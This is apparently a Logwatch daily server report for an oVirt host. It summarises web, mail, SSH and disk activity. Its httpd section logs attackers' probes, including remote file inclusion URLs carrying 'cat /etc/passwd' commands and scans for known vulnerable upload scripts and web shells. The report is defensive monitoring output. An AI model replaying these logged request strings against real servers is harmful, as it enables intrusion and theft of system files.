################### Logwatch 7.3.6 (05/19/07) ####################
Processing Initiated: Sat Dec 28 03:14:46 2013
Date Range Processed: yesterday ( 2013-Dec-27 )
Period is day.
Detail Level of Output: 0
Type of Output: unformatted
Logfiles for Host: linode01.ovirt.org
##################################################################
--------------------- httpd Begin ------------------------
A total of 1 sites probed the server
212.90.148.101
A total of 3 possible successful probes were detected (the following URLs
contain strings that match one or more of a listing of strings that
indicate a possible exploit):
/user.php?caselist[bad_file.txt][path]=http://www.google.com/humans.txt?&command=cat%20/etc/passwd HTTP Response 302
/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=http://www.google.com/humans.txt? HTTP Response 302
/gepi/gestion/savebackup.php?filename=http://www.google.com/humans.txt?&cmd=cat/etc/passwd HTTP Response 302
Requests with error response codes
403 Forbidden
/wordpress/wp-admin/: 2 Time(s)
404 Not Found
//administrator/components/com_jinc/classe ... pload_image.php: 6 Time(s)
//components/com_jinc/classes/graphics/php ... pload_image.php: 5 Time(s)
//components/com_jnews/includes/openflashc ... pload_image.php: 1 Time(s)
//images/stories/3xp.php: 2 Time(s)
/_______: 1 Time(s)
/__mailman/listinfo/users: 1 Time(s)
/admin.php: 1 Time(s)
/admin/: 1 Time(s)
/admin/banner_manager.php/login.php: 1 Time(s)
/admin/board: 4 Time(s)
/admin/categories.php/login.php: 1 Time(s)
/admin/categories.php/login.php?cPath=&act ... product_preview: 1 Time(s)
/admin/file_manager.php/login.php: 1 Time(s)
/admin/login.php: 1 Time(s)
/admin/sqlpatch.php/password_forgotten.php?action=execute: 1 Time(s)
/administrator/index.php: 1 Time(s)
/bitrix/admin/index.php?lang=en: 1 Time(s)
/blog/wp-admin/: 2 Time(s)
/board: 8 Time(s)
/category/news/feed: 1 Time(s)
/category/news/feed/: 15 Time(s)
/favicon.ico: 442 Time(s)
/fckeditor/editor/filemanager/upload/test.html: 1 Time(s)
/listinfo/board: 4 Time(s)
/mailman/project-planning/2011-September/000283.html: 1 Time(s)
/meetings/ovirt/2012/ovirt.2013-01-09-15.01.html: 2 Time(s)
/meetings/ovirt/2012/ovirt.2013-01-09-15.01.log.html: 2 Time(s)
/pipermail/infra/2012-December/001733.html ... voiy.ru//xp.php: 4 Time(s)
/pipermail/infra/2012-December/wp-content/ ... voiy.ru//xp.php: 1 Time(s)
/pipermail/infra/2012-October/001166.html& ... ?action=execute: 1 Time(s)
/pipermail/infra/2012-October/001233.html& ... r.php/login.php: 2 Time(s)
/pipermail/infra/2012-October/001233.html& ... s.php/login.php: 1 Time(s)
/pipermail/infra/2012-October/admin/banner ... r.php/login.php: 1 Time(s)
/pipermail/infra/2012-October/admin/catego ... product_preview: 1 Time(s)
/pipermail/infra/2012-October/admin/categories.php/login.php: 1 Time(s)
/pipermail/infra/2012-October/admin/file_m ... r.php/login.php: 1 Time(s)
/pipermail/infra/2012-October/admin/sqlpat ... ?action=execute: 1 Time(s)
/pipermail/infra/2013-December//administra ... pload_image.php: 5 Time(s)
/pipermail/infra/2013-December//components ... pload_image.php: 6 Time(s)
/pipermail/infra/2013-December/004585.html ... pload_image.php: 10 Time(s)
/pipermail/infra/2013-February/001992.html ... cl%2Fspydee.php: 2 Time(s)
/pipermail/infra/2013-February/002129.html ... voiy.ru//xp.php: 2 Time(s)
/pipermail/infra/2013-February/wp-content/ ... cl%2Fspydee.php: 1 Time(s)
/pipermail/infra/2013-February/wp-content/ ... voiy.ru//xp.php: 1 Time(s)
/pipermail/infra/2013-March/tiki-register.php: 3 Time(s)
/pipermail/infra/2013-May/002991.html& ... rd.php?id=byroe: 1 Time(s)
/pipermail/infra/2013-May/003102.html& ... voiy.ru//xp.php: 2 Time(s)
/pipermail/infra/2013-May/wp-content/theme ... voiy.ru//xp.php: 1 Time(s)
/pipermail/infra/2013-May/zboard.php?id=byroe: 1 Time(s)
/pipermail/infra/2013-October//administrat ... pload_image.php: 1 Time(s)
/pipermail/infra/2013-October//components/ ... pload_image.php: 1 Time(s)
/pipermail/infra/2013-October/004039.html& ... pload_image.php: 10 Time(s)
/pipermail/node-patches/2013-march/004623.html: 1 Time(s)
/pipermail/user/register: 2 Time(s)
/pipermail/users/2012-April//images/stories/3xp.php: 2 Time(s)
/pipermail/users/2012-April/007177.html+++ ... F0%E0%E2%EA%E8;: 3 Time(s)
/releases//3.3/rpm/EL/6Server/repodata/695 ... -primary.xml.gz: 1 Time(s)
/releases/3.2/rpm/EL/20/repodata/repomd.xml: 7 Time(s)
/releases/3.3.2/rpm/Fedora/16/repodata/repomd.xml: 1 Time(s)
/releases/3.3.2/rpm/Fedora/17/repodata/repomd.xml: 10 Time(s)
/releases/3.3.2/rpm/Fedora/19/repodata/1ea ... ists.sqlite.bz2: 1 Time(s)
/releases/3.3.2/rpm/Fedora/20/repodata/repomd.xml: 218 Time(s)
/releases/alpha/rpm/Fedora/20/repodata/repomd.xml: 48 Time(s)
/releases/beta/rpm/Fedora/$releasever/: 1 Time(s)
/releases/beta/rpm/Fedora/18/repodata/repomd.xml: 4 Time(s)
/releases/beta/rpm/Fedora/20/repodata/repomd.xml: 91 Time(s)
/releases/nightly/RHEL/6/repodata/repomd.xml: 2 Time(s)
/releases/nightly/fedora/16/: 1 Time(s)
/releases/nightly/fedora/16/ovirt-engine.repo: 1 Time(s)
/releases/nightly/fedora/16/repodata/repomd.xml: 240 Time(s)
/releases/nightly/fedora/17: 1 Time(s)
/releases/nightly/rpm/EL/6/SRPMS/ovirt-eng ... 912.el6.src.rpm: 1 Time(s)
/releases/nightly/rpm/EL/6/SRPMS/ovirt-eng ... 953.el6.src.rpm: 1 Time(s)
/releases/nightly/rpm/EL/6/SRPMS/vdsm-4.13 ... a97.el6.src.rpm: 1 Time(s)
/releases/nightly/rpm/EL/6/hooks/vdsm-hook ... .el6.noarch.rpm: 1 Time(s)
/releases/nightly/rpm/Fedora/17/noarch/: 1 Time(s)
/releases/nightly/rpm/Fedora/17/repodata/repomd.xml: 2 Time(s)
/releases/nightly/rpm/Fedora/19/SRPMS/ovir ... 07.fc19.src.rpm: 1 Time(s)
/releases/nightly/rpm/Fedora/19/SRPMS/ovir ... 50.fc19.src.rpm: 1 Time(s)
/releases/nightly/rpm/Fedora/19/SRPMS/ovir ... f7.fc19.src.rpm: 1 Time(s)
/releases/nightly/rpm/Fedora/19/SRPMS/vdsm ... 1e.fc19.src.rpm: 1 Time(s)
/releases/nightly/rpm/Fedora/19/SRPMS/vdsm ... 4d.fc19.src.rpm: 1 Time(s)
/releases/nightly/rpm/Fedora/19/repodata/0 ... ther.sqlite.bz2: 6 Time(s)
/releases/nightly/rpm/Fedora/19/repodata/8 ... -primary.xml.gz: 1 Time(s)
/releases/nightly/rpm/el/6/repodata/repomd.xml: 13 Time(s)
/releases/o: 1 Time(s)
/releases/ovirt-fedora.noarch.rpm: 1 Time(s)
/releases/ovirt-release-centos.noarch.rpm: 1 Time(s)
/releases/ovirt-release-el6-8-1.noarch.rpm: 7 Time(s)
/releases/ovirt-release-el6.noarch.rpm: 1 Time(s)
/releases/ovirt-release-fedora-4-2.noarch.rpm: 1 Time(s)
/releases/ovirt-release-fedora.noarch.rpm%e2%80%9d: 1 Time(s)
/releases/ovirt-release-fedora.noarch.rpm/ ... data/repomd.xml: 2 Time(s)
/releases/stable/binary/: 5 Time(s)
/releases/stable/fedora/16/repodata/filelists.xml.gz: 24 Time(s)
/releases/stable/fedora/16/repodata/repomd.xml: 250 Time(s)
/releases/stable/ovirt-engine.repo: 1 Time(s)
/releases/stable/rpm/EL/$releaserver: 1 Time(s)
/releases/stable/rpm/EL/6.2/repodata/repomd.xml: 2 Time(s)
/releases/stable/rpm/EL/6/images/pxeboot/: 1 Time(s)
/releases/stable/rpm/EL/6/repodata/69581d4 ... -primary.xml.gz: 1 Time(s)
/releases/stable/rpm/EL/6Workstation/repodata/repomd.xml: 2 Time(s)
/releases/stable/rpm/EL6/6/repodata/repomd.xml: 2 Time(s)
/releases/stable/rpm/EL6/6Workstation/repodata/repomd.xml: 2 Time(s)
/releases/stable/rpm/Fedora//repodata/repomd.xml: 1 Time(s)
/releases/stable/rpm/Fedora/15/repodata/repomd.xml: 14 Time(s)
/releases/stable/rpm/Fedora/16/repodata/repomd.xml: 16 Time(s)
/releases/stable/rpm/Fedora/19/repodata/51 ... ists.sqlite.bz2: 1 Time(s)
/releases/stable/rpm/Fedora/20/repodata/re ... 5bErrno%2014%5d: 2 Time(s)
/releases/stable/rpm/Fedora/20/repodata/repomd.xml: 420 Time(s)
/releases/stable/rpm/Fedora/repodata/repomd.xml: 8 Time(s)
/releases/updates-testing/rpm/Fedora/20/repodata/repomd.xml: 72 Time(s)
/releases/user/register: 1 Time(s)
/robots.txt: 81 Time(s)
/user/: 1 Time(s)
/user/register: 2 Time(s)
/wp-admin/: 2 Time(s)
/wp-content/themes/multidesign/scripts/ima ... voiy.ru//xp.php: 1 Time(s)
/wp-content/themes/welcome_inn/thumb.php?s ... cl%2Fspydee.php: 1 Time(s)
/wp-login.php: 6 Time(s)
/wp-login.php?action=register: 8 Time(s)
/wp/wp-admin/: 2 Time(s)
/zboard.php?id=byroe: 1 Time(s)
416 Request Range Not Satisfiable
/releases/stable/rpm/Fedora/18/noarch/ovir ... -7-1.noarch.rpm: 1 Time(s)
/releases/stable/rpm/Fedora/18/noarch/ovir ... fc18.noarch.rpm: 4 Time(s)
---------------------- httpd End -------------------------
--------------------- Postfix Begin ------------------------
14 *Warning: Pre-queue content-filter connection overload
11.955M Bytes accepted 12,535,300
74.876M Bytes delivered 78,513,420
======== ================================================
827 Accepted 99.40%
5 Rejected 0.60%
-------- ------------------------------------------------
832 Total 100.00%
======== ================================================
2 Reject relay denied 40.00%
3 Reject unknown user 60.00%
-------- ------------------------------------------------
5 Total Rejects 100.00%
======== ================================================
690 Connections made
690 Disconnections
817 Removed from queue
428 Delivered
8437 Sent via SMTP
7 Forwarded
40 Deferred
333 Deferrals
1 Bounce (local)
1 Bounce (remote)
2 Expired and returned to sender
4 DSNs undeliverable
245 Connection failure (outbound)
16 Timeout (inbound)
98 Hostname verification errors
55 Enabled PIX workaround
**Unmatched Entries**
1 Dec 27 13:21:18 linode01 postfix/smtp[10751]: 5FB1AC263: host
emailgw02.pnnl.gov[2620:0:50f0:2309:192:101:109:63] refused to talk to me: 554
emailgw02.pnnl.gov
1 Dec 27 23:09:13 linode01 postfix/smtp[19545]: 33FC5C1E2: host
emailgw02.pnnl.gov[2620:0:50f0:2309:192:101:109:63] refused to talk to me: 554
emailgw02.pnnl.gov
1 Dec 27 06:10:12 linode01 postfix/smtp[4587]: 86B2FC181: host
emailgw01.pnnl.gov[2620:0:50f0:2309:192:101:109:61] refused to talk to me: 554
Emailgw01.pnnl.gov
1 Dec 27 07:47:38 linode01 postfix/smtp[5928]: D48ABC1DB: host
emailgw01.pnnl.gov[2620:0:50f0:2309:192:101:109:61] refused to talk to me: 554
Emailgw01.pnnl.gov
1 Dec 27 23:09:13 linode01 postfix/smtp[19604]: 33FC5C1E2: host
mailgateway.anl.gov[2620:0:dc0:1805::28] refused to talk to me:
554-mailgateway.anl.gov
554 Your access to this mail system has been rejected due to the sending MTA's poor
reputation. If you believe that this failure is in error, please contact the intended
recipient via alternate means.
1 Dec 27 13:20:17 linode01 postfix/smtp[10731]: D98DDC1E0: host
mailfilter2.netspot.com.au[2400:7d00:110:2::202] refused to talk to me:
554-int-mailfilter-prod-ame1a.ame1.netspot.com.au 554 Your access to this mail system has
been rejected due to the sending MTA's poor reputation. If you believe that this
failure is in error, please contact the intended recipient via alternate means.
1 Dec 27 07:47:38 linode01 postfix/smtp[5949]: D48ABC1DB: host
mailgateway.anl.gov[2620:0:dc0:1805::28] refused to talk to me:
554-mailgateway.anl.gov
554 Your access to this mail system has been rejected due to the sending MTA's poor
reputation. If you believe that this failure is in error, please contact the intended
recipient via alternate means.
1 Dec 27 16:54:20 linode01 postfix/smtp[13708]: AB57BC1E0: host
emailgw01.pnnl.gov[2620:0:50f0:2309:192:101:109:61] refused to talk to me: 554
Emailgw01.pnnl.gov
1 Dec 27 13:21:28 linode01 postfix/smtp[10784]: 073B4C266: host
emailgw02.pnnl.gov[2620:0:50f0:2309:192:101:109:63] refused to talk to me: 554
emailgw02.pnnl.gov
1 Dec 27 13:21:18 linode01 postfix/smtp[10761]: 5FB1AC263: host
mailgateway.anl.gov[2620:0:dc0:1805::28] refused to talk to me:
554-mailgateway.anl.gov
554 Your access to this mail system has been rejected due to the sending MTA's poor
reputation. If you believe that this failure is in error, please contact the intended
recipient via alternate means.
1 Dec 27 13:21:28 linode01 postfix/smtp[10724]: 073B4C266: host
mailgateway.anl.gov[2620:0:dc0:1805::28] refused to talk to me:
554-mailgateway.anl.gov
554 Your access to this mail system has been rejected due to the sending MTA's poor
reputation. If you believe that this failure is in error, please contact the intended
recipient via alternate means.
1 Dec 27 23:09:13 linode01 postfix/smtp[19545]: 33FC5C1E2: host
emailgw01.pnnl.gov[2620:0:50f0:2309:192:101:109:61] refused to talk to me: 554
Emailgw01.pnnl.gov
1 Dec 27 06:10:12 linode01 postfix/smtp[4587]: 86B2FC181: host
emailgw02.pnnl.gov[2620:0:50f0:2309:192:101:109:63] refused to talk to me: 554
emailgw02.pnnl.gov
1 Dec 27 13:21:10 linode01 postfix/smtp[10751]: C7EACC213: host
emailgw02.pnnl.gov[2620:0:50f0:2309:192:101:109:63] refused to talk to me: 554
emailgw02.pnnl.gov
1 Dec 27 07:47:38 linode01 postfix/smtp[5928]: D48ABC1DB: host
emailgw02.pnnl.gov[2620:0:50f0:2309:192:101:109:63] refused to talk to me: 554
emailgw02.pnnl.gov
1 Dec 27 07:47:40 linode01 postfix/smtp[5963]: 1FA6AC215: host
mailgateway.anl.gov[2620:0:dc0:1805::28] refused to talk to me:
554-mailgateway.anl.gov
554 Your access to this mail system has been rejected due to the sending MTA's poor
reputation. If you believe that this failure is in error, please contact the intended
recipient via alternate means.
1 Dec 27 13:21:09 linode01 postfix/smtp[10750]: C7EACC213: host
mailgateway.anl.gov[2620:0:dc0:1805::28] refused to talk to me:
554-mailgateway.anl.gov
554 Your access to this mail system has been rejected due to the sending MTA's poor
reputation. If you believe that this failure is in error, please contact the intended
recipient via alternate means.
1 Dec 27 13:21:10 linode01 postfix/smtp[10751]: C7EACC213: host
emailgw01.pnnl.gov[2620:0:50f0:2309:192:101:109:61] refused to talk to me: 554
Emailgw01.pnnl.gov
1 Dec 27 13:21:28 linode01 postfix/smtp[10784]: 073B4C266: host
emailgw01.pnnl.gov[2620:0:50f0:2309:192:101:109:61] refused to talk to me: 554
Emailgw01.pnnl.gov
1 Dec 27 13:21:18 linode01 postfix/smtp[10751]: 5FB1AC263: host
emailgw01.pnnl.gov[2620:0:50f0:2309:192:101:109:61] refused to talk to me: 554
Emailgw01.pnnl.gov
1 Dec 27 16:54:20 linode01 postfix/smtp[13708]: AB57BC1E0: host
emailgw02.pnnl.gov[2620:0:50f0:2309:192:101:109:63] refused to talk to me: 554
emailgw02.pnnl.gov
1 Dec 27 06:10:11 linode01 postfix/smtp[4669]: 86B2FC181: host
mailgateway.anl.gov[2620:0:dc0:1805::28] refused to talk to me:
554-mailgateway.anl.gov
554 Your access to this mail system has been rejected due to the sending MTA's poor
reputation. If you believe that this failure is in error, please contact the intended
recipient via alternate means.
1 Dec 27 16:54:19 linode01 postfix/smtp[13723]: AB57BC1E0: host
mailgateway.anl.gov[2620:0:dc0:1805::28] refused to talk to me:
554-mailgateway.anl.gov
554 Your access to this mail system has been rejected due to the sending MTA's poor
reputation. If you believe that this failure is in error, please contact the intended
recipient via alternate means.
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: jenkins (45687666)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Users logging in through sshd:
gerrit-backup:
107.22.212.69 (gerrit.ovirt.org): 2 times
jenkins:
66.187.237.11 (nat-pool-tlv-u1.redhat.com): 1 time
Received disconnect:
11: Bye Bye : 390 Time(s)
11: Goodbye : 2 Time(s)
11: disconnected by user : 2 Time(s)
SFTP subsystem requests: 1 Time(s)
**Unmatched Entries**
reverse mapping checking getaddrinfo for dsl-187-139-26-169-dyn.prod-infinitum.com.mx [187.139.26.169] failed - POSSIBLE BREAK-IN ATTEMPT! : 1 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/xvda 59G 52G 7.8G 87% /
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################